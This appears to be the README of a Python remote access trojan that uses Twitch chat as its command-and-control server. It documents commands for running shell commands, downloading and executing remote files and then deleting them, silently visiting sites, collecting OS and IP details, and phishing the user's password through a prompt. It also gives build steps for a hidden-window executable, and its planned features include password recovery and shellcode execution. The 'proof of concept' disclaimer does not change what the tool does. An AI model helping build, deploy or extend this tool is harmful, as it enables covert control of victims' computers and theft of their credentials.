A remote administration tool that uses Twitch Chat as a Command and Control server. This program connects clients to a designated Twitch Chat and listens for commands.
- Twitch account.
- Python 3.x
- PyInstaller (will be required with the next build.)
The usage of this program directly violates the Twitch Developer Agreement. The usage of it will lead to the termination of your account and possible further action based on the severity of its usage.
This program was created as a Proof of Concept and it is not intended to be used in a malicious way. I am not responsible for any damages or criminal charges that come from using it.
cmd Windows CMD commands. Structured as cmd command
de Download and execute. File is removed after execution. Structured as de link. May throw Win5 Error if the user is prompted for UAC. Now supports all file types.
visit Silently visits a website. Structured as visit link
exit Disconnects the targeted client(s). This does not remove the file. Structured as exit
info Returns the clients OS (including exact version) and IP address. Structured as info
mbox Opens a messagebox on the users pc. Structured as mbox message
askpass Prompts the user to enter their password then returns the value. Structured as askpass
Navigate to the twitch page of the channel you selected when making the program.
Upon connection to a server, a new client will announce its presence and client name. If you would like to view a list of all connected clients please use the list command.
!list
This program also features different modules which can be used.
!act client command action
- Act is the keyword to use a command for the client.
- Client specifies a singular user or a group. You can use a specific name (ex: DESKTOP-TEST) or 'all'.
- Command specifies the intended module to use.
- Action is what to use with the selected module. For example 'start.' will open the current directory on the clients PC when using CMD.
An example cmd command would be:
!act all cmd start.
This would open the current directory on every connected clients PC. Note that the photo is from an older version and True is no longer required.
An example download+execute command would be:
!act DESKTOP-TEST de https://example.com/files/file.exe
The requirements list is currently not necessary but will be for future builds.
Making the program is quite simple.
- Change the NICK value on line 12 to your Twitch username.
- Change the PASS value on line 13 to your OAuth password (acquire it here: https://twitchapps.com/tmi/)
- Change the CHAN value on line 14 to a desired channel to listen in. It's recommended to use your personal twitch chat as a streamer may ban an account they see posting odd messages and commands.
- CLIENT_ID and the email information are currently not in use. The email functions will be used for password recovery and the CLIENT_ID will be an Imgur API client ID for screenshot uploads.
Build the created python file with PyInstaller. Make sure you pass the --windowed and --onefile arguments.
- Password recovery module.
- Screenshot module.
- Shellcode execution module (maybe.)
- A builder to simplify making the program as well as making it an exe.
- Command line based control module as an alternative to the twitch website.
- n00py and Coalfire Research for inspiration from the Slackor project.
- nathanlopez from the Stitch project for the
mboxandaskpasscode.